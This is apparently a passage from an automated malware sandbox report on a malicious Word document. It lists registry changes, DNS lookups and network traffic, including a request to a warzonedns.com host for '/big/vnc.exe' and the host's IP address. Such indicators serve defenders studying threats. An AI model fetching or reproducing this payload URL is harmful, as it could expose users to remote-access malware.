  1100. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url32x32",
  1101. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\WLMOUNTED_SKYDRIVE\\Thumbnails\\Url48x48",
  1102. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005119110000000000000000F01FEC\\Usage\\ProductFiles",
  1103. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\General\\LastAutoSavePurgeTime",
  1104. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Security\\Trusted Documents\\LastPurgeTime",
  1105. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\Licensing\\09D07EFC505F4D9CBFD5ACE3217F6654",
  1106. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\DocumentRecovery\\1660403\\182CE20",
  1107. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090434",
  1108. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457503",
  1109. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033917",
  1110. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457510",
  1111. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001105",
  1112. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033919",
  1113. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457464",
  1114. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457475",
  1115. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033925",
  1116. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033927",
  1117. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457485",
  1118. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033937",
  1119. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001106",
  1120. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033921",
  1121. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457444",
  1122. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03090430",
  1123. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457515",
  1124. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457496",
  1125. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM04033929",
  1126. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM03457491",
  1127. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001103",
  1128. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\Themes\\1033\\TM10001104",
  1129. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328935",
  1130. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328972",
  1131. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328990",
  1132. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328951",
  1133. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328986",
  1134. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328975",
  1135. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328998",
  1136. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328983",
  1137. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328932",
  1138. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328908",
  1139. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328884",
  1140. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328940",
  1141. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328925",
  1142. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328919",
  1143. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328916",
  1144. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM02835233",
  1145. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM01840907",
  1146. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851221",
  1147. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851217",
  1148. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851224",
  1149. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851223",
  1150. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851226",
  1151. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851225",
  1152. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851227",
  1153. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851220",
  1154. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851219",
  1155. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851216",
  1156. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851222",
  1157. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocBibs\\1033\\TM02851218",
  1158. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998159",
  1159. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\WordDocParts\\1033\\TM03998158",
  1160. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328905",
  1161. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\LCCache\\SmartArt\\1033\\TM03328893",
  1162. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\EquationEditorFilesIntl_1033",
  1163. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options",
  1164. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithList\\MRUList",
  1165. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR",
  1166. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
  1167. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\S38OS404-1Q43-42S2-9305-67QR0O28SP23\\rkcybere.rkr",
  1168. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.106\\CheckSetting",
  1169. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.101\\CheckSetting",
  1170. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.103\\CheckSetting",
  1171. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.100\\CheckSetting",
  1172. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.102\\CheckSetting",
  1173. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\E8433B72-5842-4d43-8645-BC2C35960837.check.104\\CheckSetting",
  1174. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Action Center\\Checks\\11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78.check.101\\CheckSetting"
  1175.  
  1176.  
  1177. * Deleted Registry Keys:
  1178. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\yn",
  1179. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\cgl",
  1180. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
  1181. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
  1182. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
  1183. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
  1184. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
  1185. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey"
  1186.  
  1187.  
  1188. * DNS Communications:
  1189.  
  1190. "type": "A",
  1191. "request": "qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com",
  1192. "answers":
  1193.  
  1194. "data": "23.249.165.218",
  1195. "type": "A"
  1196.  
  1197.  
  1198.  
  1199.  
  1200.  
  1201. * Domains:
  1202.  
  1203. "ip": "23.249.165.218",
  1204. "domain": "qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com"
  1205.  
  1206.  
  1207.  
  1208. * Network Communication - ICMP:
  1209.  
  1210. * Network Communication - HTTP:
  1211.  
  1212. "count": 1,
  1213. "body": "",
  1214. "uri": "http://qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com/big/vnc.exe",
  1215. "user-agent": "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)",
  1216. "method": "GET",
  1217. "host": "qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com",
  1218. "version": "1.1",
  1219. "path": "/big/vnc.exe",
  1220. "data": "GET /big/vnc.exe HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)\r\nHost: qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com\r\nConnection: Keep-Alive\r\n\r\n",
  1221. "port": 80
  1222.  
  1223.  
  1224.  
  1225. * Network Communication - SMTP:
  1226.  
  1227. * Network Communication - Hosts:
  1228.  
  1229. "country_name": "United States",
  1230. "ip": "23.249.165.218",
  1231. "inaddrarpa": "",
  1232. "hostname": "qeeeeewwswsweerwwerwerwrwerwerwerwere.warzonedns.com"
  1233.  
  1234.  
  1235.  
  1236. * Network Communication - IRC: